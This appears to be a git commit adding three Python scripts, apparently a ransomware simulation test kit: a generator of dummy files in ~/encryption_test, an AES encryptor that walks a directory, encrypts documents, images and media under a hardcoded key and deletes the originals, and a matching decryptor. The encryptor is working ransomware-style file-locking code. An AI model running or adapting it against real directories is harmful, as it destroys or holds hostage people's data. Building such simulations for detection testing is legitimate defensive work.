initial commit

This commit is contained in:
Kosta Mushkin
2025-04-12 14:33:32 -04:00
parent 955ec79014
commit ba16ef9a08
83 changed files with 10290 additions and 2 deletions
+78
View File
@@ -0,0 +1,78 @@
#!/usr/bin/env python3
import os
import argparse
import logging
import shutil
def create_dataset(base_dir: str, number_of_files: int):
"""Create test files filled with specific content."""
try:
# Validate input
if number_of_files <= 0:
raise ValueError("Number of files must be positive")
# Create directory if it doesn't exist
os.makedirs(base_dir, exist_ok=True)
# Calculate required disk space (approximate)
required_space = number_of_files * 1024 * 1024 # 1MB per file
free_space = shutil.disk_usage(base_dir).free
if free_space < required_space:
raise ValueError(
f"Not enough disk space. Need {required_space / (1024**3):.2f} GB, "
f"but only {free_space / (1024**3):.2f} GB available"
)
# Calculate how many lines we need for ~1MB file
# Each line is about 6 bytes (5 chars + newline)
# 1MB = 1048576 bytes
# Actual calculation: 1048576 / 6 = 174762.67
lines_per_file = 174763
# Create files
for i in range(number_of_files):
file_path = os.path.join(base_dir, f"file{i:04d}.txt")
with open(file_path, 'w') as f:
for _ in range(lines_per_file):
f.write(f'file{i:04d}\n')
# Log every 100 files
if (i + 1) % 100 == 0:
logging.info(f"Created {i + 1} files...")
logging.info(f"Created dataset in {base_dir}")
logging.info(f"Total files created: {number_of_files}")
# Log total size of the dataset
total_size = sum(os.path.getsize(os.path.join(base_dir, f))
for f in os.listdir(base_dir))
logging.info(f"Total dataset size: {total_size / (1024*1024):.2f} MB")
logging.info(f"Average file size: {total_size / (number_of_files * 1024*1024):.2f} MB")
except Exception as e:
logging.error(f"Failed to create dataset: {str(e)}")
raise
def main():
parser = argparse.ArgumentParser(description="Create test dataset")
parser.add_argument("--base_dir", default="~/encryption_test",
help="Base directory for test files (default: ~/encryption_test)")
parser.add_argument("--number_of_files", type=int, required=True,
help="Number of files to create")
args = parser.parse_args()
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
# Expand user path (~/...)
base_dir = os.path.expanduser(args.base_dir)
create_dataset(base_dir, args.number_of_files)
if __name__ == "__main__":
main()
+129
View File
@@ -0,0 +1,129 @@
#!/usr/bin/env python3
import os
import argparse
import logging
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64
import sys
def generate_key(password: str) -> bytes:
"""Generate an AES key from a password."""
# Using a fixed key for testing (similar to PowerShell script)
key = "Q5KyUru6wn82hlY9k8xUjJOPIC9da41jgRkpt21jo2L="
return base64.b64decode(key)
def decrypt_file(file_path: str, key: bytes) -> bool:
"""Decrypt a single file using AES."""
try:
# Read the encrypted file
with open(file_path, 'rb') as file:
# Read IV (first 16 bytes) and encrypted data
iv = file.read(16)
encrypted_data = file.read()
# Create AES cipher
cipher = Cipher(
algorithms.AES(key),
modes.CBC(iv),
backend=default_backend()
)
decryptor = cipher.decryptor()
# Decrypt the data
padded_data = decryptor.update(encrypted_data) + decryptor.finalize()
# Remove padding
unpadder = padding.PKCS7(128).unpadder()
decrypted_data = unpadder.update(padded_data) + unpadder.finalize()
# Write the decrypted data to a new file (remove .encrypted suffix)
decrypted_path = file_path.rsplit('.encrypted', 1)[0]
with open(decrypted_path, 'wb') as file:
file.write(decrypted_data)
# Remove the encrypted file
os.remove(file_path)
return True
except Exception as e:
logging.error(f"Failed to decrypt {file_path}: {str(e)}")
return False
def decrypt_directory(base_dir: str, password: str):
"""Decrypt all encrypted files in the specified directory."""
try:
# Generate decryption key
key = generate_key(password)
# Get list of encrypted files
files = []
for root, _, filenames in os.walk(base_dir):
for filename in filenames:
if filename.endswith('.encrypted'):
files.append(os.path.join(root, filename))
total_files = len(files)
if total_files == 0:
logging.info("No encrypted files found")
return
logging.info(f"Found {total_files} encrypted files")
# Track progress
successful = 0
failed = 0
# Process each file
for i, file_path in enumerate(files, 1):
logging.info(f"Decrypting {file_path}")
if decrypt_file(file_path, key):
successful += 1
else:
failed += 1
# Log progress every 100 files or at the end
if i % 100 == 0 or i == total_files:
logging.info(f"Processed {i}/{total_files} files...")
# Log final results
logging.info("Decryption complete!")
logging.info(f"Successfully decrypted: {successful} files")
if failed > 0:
logging.warning(f"Failed to decrypt: {failed} files")
except Exception as e:
logging.error(f"Decryption failed: {str(e)}")
raise
def main():
parser = argparse.ArgumentParser(description="Decrypt files in directory")
parser.add_argument("--base_dir", default="~/encryption_test",
help="Base directory containing files to decrypt (default: ~/encryption_test)")
parser.add_argument("--password", required=True,
help="Password for decryption (must match encryption password)")
args = parser.parse_args()
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
# Expand user path (~/...)
base_dir = os.path.expanduser(args.base_dir)
# Verify directory exists
if not os.path.isdir(base_dir):
logging.error(f"Directory not found: {base_dir}")
sys.exit(1)
decrypt_directory(base_dir, args.password)
if __name__ == "__main__":
main()
+140
View File
@@ -0,0 +1,140 @@
#!/usr/bin/env python3
import os
import argparse
import logging
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64
import sys
def generate_key(password: str) -> bytes:
"""Generate an AES key from a password."""
# Using a fixed key for testing (similar to PowerShell script)
key = "Q5KyUru6wn82hlY9k8xUjJOPIC9da41jgRkpt21jo2L="
return base64.b64decode(key)
def encrypt_file(file_path: str, key: bytes) -> bool:
"""Encrypt a single file using AES."""
try:
# Read the original file
with open(file_path, 'rb') as file:
file_data = file.read()
# Create an initialization vector
iv = os.urandom(16)
# Create AES cipher
cipher = Cipher(
algorithms.AES(key),
modes.CBC(iv),
backend=default_backend()
)
encryptor = cipher.encryptor()
# Add padding
padder = padding.PKCS7(128).padder()
padded_data = padder.update(file_data) + padder.finalize()
# Encrypt the data
encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
# Write the encrypted data to a new file
encrypted_path = f"{file_path}.encrypted"
with open(encrypted_path, 'wb') as file:
# Write IV first, then encrypted data
file.write(iv)
file.write(encrypted_data)
# Remove the original file
os.remove(file_path)
return True
except Exception as e:
logging.error(f"Failed to encrypt {file_path}: {str(e)}")
return False
def encrypt_directory(base_dir: str, password: str):
"""Encrypt all files in the specified directory."""
try:
# Generate encryption key
key = generate_key(password)
# Define target file extensions (same as PowerShell script)
target_extensions = [
'.pdf', '.xls', '.xlsx', '.ppt', '.pptx', '.doc', '.docx',
'.rtf', '.txt', '.csv', '.jpg', '.jpeg', '.png', '.gif',
'.avi', '.midi', '.mov', '.mp3', '.mp4', '.mpeg', '.mpg', '.ogg'
]
# Get list of files to encrypt
files = []
for root, _, filenames in os.walk(base_dir):
for filename in filenames:
if any(filename.lower().endswith(ext) for ext in target_extensions) and \
not filename.endswith('.encrypted'):
files.append(os.path.join(root, filename))
total_files = len(files)
if total_files == 0:
logging.info("No files found to encrypt")
return
logging.info(f"Found {total_files} files to encrypt")
# Track progress
successful = 0
failed = 0
# Process each file
for i, file_path in enumerate(files, 1):
logging.info(f"Encrypting {file_path}")
if encrypt_file(file_path, key):
successful += 1
else:
failed += 1
# Log progress every 100 files or at the end
if i % 100 == 0 or i == total_files:
logging.info(f"Processed {i}/{total_files} files...")
# Log final results
logging.info("Encryption complete!")
logging.info(f"Successfully encrypted: {successful} files")
if failed > 0:
logging.warning(f"Failed to encrypt: {failed} files")
except Exception as e:
logging.error(f"Encryption failed: {str(e)}")
raise
def main():
parser = argparse.ArgumentParser(description="Encrypt files in directory")
parser.add_argument("--base_dir", default="~/encryption_test",
help="Base directory containing files to encrypt (default: ~/encryption_test)")
parser.add_argument("--password", required=True,
help="Password for encryption")
args = parser.parse_args()
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
# Expand user path (~/...)
base_dir = os.path.expanduser(args.base_dir)
# Verify directory exists
if not os.path.isdir(base_dir):
logging.error(f"Directory not found: {base_dir}")
sys.exit(1)
encrypt_directory(base_dir, args.password)
if __name__ == "__main__":
main()